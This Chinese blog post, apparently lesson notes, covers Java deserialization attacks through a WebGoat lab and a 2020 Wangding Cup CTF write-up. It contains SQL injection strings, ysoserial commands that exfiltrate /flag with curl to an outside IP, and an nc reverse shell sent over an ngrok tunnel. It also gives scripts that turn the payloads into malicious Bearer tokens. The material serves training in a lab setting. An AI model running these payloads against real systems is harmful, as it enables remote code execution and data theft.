38:WEB漏洞-反序列化之PHP&JAVA全解(下)

思维导图

Java中的API实现:

  位置: Java.io.ObjectOutputStream   java.io.ObjectInputStream

  序列化:  ObjectOutputStream类 --> writeObject()

        注:该方法对参数指定的obj对象进行序列化,把字节序列写到一个目标输出流中

          按Java的标准约定是给文件一个.ser扩展名

  反序列化: ObjectInputStream类 --> readObject()   

        注:该方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回。

序列化和反序列化

  • 序列化(Serialization):将对象的状态信息转换为字节序列(即可以存储或传输的形式)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
  • 反序列化:从存储区中读取该数据,并将其还原为对象的过程。 

下方的特征可以作为序列化的标志参考:

  • 一段数据以rO0AB开头,基本可以确定这串就是JAVA序列化base64加密的数据。
  • 或者如果以aced开头,那么他就是这一段java序列化的16进制。

本课重点

  • 案例1:Java反序列化及命令执行代码测试
  • 案例2:WebGoat_Javaweb靶场反序列化测试
  • 案例3:2020-网鼎杯-朱雀组-Web-think_java真题复现

案例1:Java反序列化及命令执行代码测试

java反序列化代码测试

序列化过程:使用writeobject方法,将Person对象数据转化为txt乱码数据;

反序列化过程:使用readobject方法,将txt乱码数据转化为Person对象数据。

命令执行代码测试

如果结合java反序列化+代码执行,将会给系统带来不可预料的危害。

案例2:WebGoat_Javaweb靶场反序列化测试

WebGoat漏洞环境下载:https://github.com/WebGoat/WebGoat/releases

命令行启动:java -jar webgoat-server-8.2.2.jar

浏览器打开

使用jd-gui工具或者IDEA工具(推荐)打开webgoat-server-8.2.2.jar,分析源代码。

找到反序列化函数

反序列化这里可以执行对象中的代码

此时,基本可以 确定存在反序列化漏洞。如何利用?

本题目页面上的数据以rO0AB开头,可以确定这串就是JAVA序列化base64加密的数据。

所以我们在构造payload时,需要如下几步:

构造含有命令(比如ipconfig)的对象-->序列化-->base64-->最终payload(rO0AB开头字符串)

但是攻击时,还需要考虑回显问题,若系统不回显命令执行后的结果,即使我们攻击成功,也没用。因此我们一般需要构造反弹shell。

这个过程挺复杂,手工的话,需要一个一个尝试,效率低且不一定成功。因此我们可以使用工具生成payload。

Java反序列化验证工具:https://github.com/frohoff/ysoserial/releases

如下图,使用ysoserial工具生成payload。这里由于源代码中有hibernate组件,因此我们可以执行命令调用该组件生成payload。

payload如下

这里我们还需要将payload进行base64加密(ysoserial只能进行反序列化,它不负责base64加密)

写一个python脚本,执行,实现base64加密

生成payload.txt

全选,复制粘贴到本题目输入框,点击提交,弹出计算器。

案例3:2020-网鼎杯-朱雀组-Web-think_java真题复现

CTFHub官网:https://www.ctfhub.com/\#/challenge

页面打开如下

0x01 注入判断,获取管理员帐号密码:

根据提示附件进行javaweb代码审计,发现可能存在注入漏洞。

另外有swagger开发接口,测试注入漏洞及访问接口进行调用测试。

数据库名:myapp,列名:name,pwd

注入测试:

POST /common/test/sqlDict

dbName=myapp?a=' union select (select name from user)# 得到用户名

dbName=myapp?a=' union select (select pwd from user)# 得到密码

注入路径

注入参数

构造请求,注入成功,得到账户密码

0x02 接口测试

/swagger-ui.html接口测试:

{
"password":"ctfhub_29588_13038",
  "username": "ctfhub"
}

登录成功返回数据:

{  
"data": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABmN0Zmh1Yg==",  
"msg": "登录成功",  
"status": 2,  
"timestamps": 1594549037415
}

如下图所示,接口登录测试

回显登录成功,返回token

抓包如下

 

0x03 回显数据分析攻击思路

JAVAWEB特征可以作为序列化的标志参考:

  • 一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
  • 或者如果以aced开头,那么就是这一段java序列化的16进制。

此处登录成功时,发现回显的token是以rO0AB开头,猜测是一个JAVA序列化base64加密的数据。

分析数据:

先利用py2脚本base64解密数据

java_base64.py

import base64
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = base64.b64decode(a).encode('hex')
print(b)

再利用SerializationDumper解析数据

下载:https://github.com/NickstaDB/SerializationDumper/releases/tag/1.12

java -jar SerializationDumper.jar base64后的数据

0x04 生成反序列化payload

解密后数据中包含帐号等信息,通过接口/common/user/current分析可知数据有接受,说明存在反序列化操作,思路:将恶意代码进行序列化后进行后续操作。

使用该token访问接口/common/user/current可以查看当前用户信息

此时,我们可以构造恶意token:生成payload(反弹shell)-->base64编码-->最终payload。

这个过程比较复杂,我们可以借助工具完成。

首先,利用ysoserial进行序列化生成(反弹shell)。由于这里不知道源码,因此不能使用框架。

这里使用curl命令模拟由被攻击的服务器向我们本地服务器发送一条请求,请求的参数为根目录flag文件的内容,本地服务器监听到这个数据包就可以看到flag内容了。但是题目说flag在根目录下,随机文件名,意味着我们不知道flag的文件名,因此这种方法不行(必须想办法知道flag文件名才可以)

java -jar ysoserial-master-30099844c6-1.jar ROME "curl http://47.75.212.155:4444 -d @/flag" > xiaodi.bin

然后,利用py2脚本将反序列化数据进行base64编码。

import base64
file = open("xiaodi.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

0x05 触发反序列化,获取flag

本地服务器启动监听,执行:nc -lvvp 4444

修改请求头,数据包直接请求获取进行反序列数据加载操作。

结果,本地服务器监听到数据。实际上并没有。

这里我使用/etc/passwd代替flag,成功获取到其内容。

注意:这里的flag文件名不好获取,最后改变策略使用反弹shell的方法。

<1>在本地虚拟机启动ngrok,生成公网IP和端口

unzip /path/to/ngrok.zip     #解压安装
./ngrok authtoken XXXXXXX	#连接账户
./ngrok tcp 4444          #启动将 TCP 隧道转发到本地4444端口

<2>生成反序列化payload。生成反弹shell的payload-->base64编码-->最终payload

java -jar ysoserial-master-8eb5cbfbf6-1.jar ROME "nc 4.tcp.ngrok.io 16215 –e /bin/sh" > xiaodi.bin

python java.py 

#java.py

import base64
file = open("xiaodi.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print("Bearer "+ba)
file.close()

<3>本地虚拟机启动监听

nc -lvvp 4444 #启动监听

<4>使用该payload连接POST /common/user/current接口

 

<5>本地虚拟机接收到反弹shell,执行命令,成功拿到flag。

涉及资源:

https://www.ctfhub.com/\#/challenge
https://github.com/WebGoat/WebGoat/releases
https://github.com/frohoff/ysoserial/releases
https://github.com/NickstaDB/SerializationDumper/releases/tag/1.12

posted @ 2021-12-28 10:13  zhengna  阅读(794)  评论(0编辑  收藏  举报